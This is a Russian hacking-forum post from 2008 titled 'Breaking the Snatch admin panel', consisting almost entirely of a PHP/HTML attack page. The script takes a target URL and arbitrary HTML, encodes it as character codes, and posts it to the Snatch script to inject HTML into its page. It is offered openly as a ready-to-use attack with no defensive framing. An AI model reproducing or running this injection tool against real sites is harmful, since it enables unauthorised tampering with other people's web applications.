Ломаем админку Snatch

Discussion in 'Веб-уязвимости' started by Don Anton, 6 May 2008.

  1. Don Anton

    Don Anton Elder - Старейшина

    Joined:
    28 Feb 2008
    Messages:
    35
    Likes Received:
    121
    Reputations:
    4
    Довольно лёгкий способ взлома админки Snatch

    PHP:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    </head>
    <body>
    <?
    If (!isset($_POST[adr]))
    {
    ?>
    <form action="" method="post" name="form2">
    Адрес к файлу снетч htt://bla.bla/bla/bla.php <input name="adr" type="text" size="30">
    <textarea name="data" cols="80" rows="20"></textarea>
    <input name="go" type="submit" value="GOGOGO">
    </form>
    <?
    }
    else
    {
    $a=$_POST[adr];
    echo "Атака на снетч по адресу ".$_POST[adr];
    $data=$_POST["data"];
    //echo "Входной набор символов: ".$data."<br>";
    //echo "Результат: ";
    $data2="";
    for($i=0; $i<strlen($data); $i++){ $data2.= ord($data[$i]).",";}
    ?>
    <form action="<? echo $a; ?>" method="post" name="form">
    <br>Вставить HTML код в страницу:<br>
    <textarea name="data" cols="80" rows="20"><? echo $data2; ?></textarea>
    <input name="go" type="submit" value="GOGOGO">

    </form>
    <?
    }
    ?>
    </body>
    </html>
     
    #1 Don Anton, 6 May 2008
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.